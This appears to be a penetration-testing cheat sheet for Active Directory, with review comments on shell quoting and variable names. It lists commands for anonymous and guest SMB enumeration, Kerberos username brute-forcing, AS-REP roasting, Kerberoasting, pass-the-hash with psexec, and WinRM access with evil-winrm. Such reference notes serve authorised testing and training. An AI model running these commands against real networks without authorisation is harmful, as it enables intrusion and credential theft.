Active Directory
Enumeration
enum4linux
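# Null-session run first, then the guest account; both depend on the target allowing
# unauthenticated/guest SMB access. Expansions are quoted so a hostname containing
# unusual characters (or an empty variable) cannot split into extra arguments.
# NOTE: `&&` skips the guest run whenever the null-session run exits non-zero; use `;`
# if both should always run.
enum4linux -a -u "" -p "" "$targetdomain" && enum4linux -a -u "guest" -p "" "$targetdomain"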
crackmapexec
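# Anonymous SMB login with RID cycling (--rid-brute); quoted target so the variable is
# passed as a single argument even when it is empty or contains whitespace.
crackmapexec smb "$targetdomain" -u 'anonymous' -p '' --rid-brute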
kerbrute
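# Username enumeration against the DC via Kerberos; the wordlist path is assumed to
# exist locally — confirm before running. Domain and DC are quoted; the binary is
# invoked by relative path, so run from the directory that holds it.
./kerbrute_linux_amd64 userenum -d "$targetdomain" --dc "$targetdc" /usr/share/wordlists/xato-net-10-million-usernames.txt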
rpcclient
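# Interactive RPC session as the guest account (password prompted by rpcclient).
rpcclient -U guest "$targetdomain"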
smbclient
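# Connect to the C$ admin share as guest. Inside double quotes `\\` becomes `\` and
# `\$` keeps the literal `$`, so the service name passed is \\<host>\C$ — the same
# string the original unquoted form produced.
smbclient "\\\\$targetdomain\\C\$" -U guest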
impacket
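# Impacket examples. Every expansion is quoted; the credential string for
# mssqlclient.py is now one quoted word (the original left `@$targetdomain` outside
# the quotes, which splits if the value contains whitespace).
# NOTE(review): -dc-ip is passed $targetdomain here, while kerbrute above uses a
# separate $targetdc — confirm which variable holds the DC address.
python GetNPUsers.py "$targetdomain/" -usersfile users.txt -dc-ip "$targetdomain"
python GetUserSPNs.py -request -dc-ip "$targetdomain" "$targetdomain/guest" -no-pass
python mssqlclient.py -p 1433 -windows-auth -dc-ip "$targetdomain" "$targetdomain/$targetusername:$targetpassword@$targetdomain"
# `hhhhhhhhh:hhhhhhhhh` is the page's placeholder for the LMHASH:NTHASH pair; replace
# it before use. $targetadmin is a different variable from $targetusername above.
python psexec.py -hashes hhhhhhhhh:hhhhhhhhh "$targetadmin@$targetdomain"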
Exploit
evil-winrm
- evil-winrm
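# Install then connect over WinRM; host, user and password are quoted so values with
# spaces or shell metacharacters are passed intact. The password is still visible on
# the command line (`ps`, shell history) — prefer a prompt or env var if that matters.
# NOTE(review): this uses $targetuser, while the mssqlclient line uses $targetusername —
# confirm the intended variable name.
gem install evil-winrm
evil-winrm -i "$targetdomain" -u "$targetuser@$targetdomain" -p "$targetpassword"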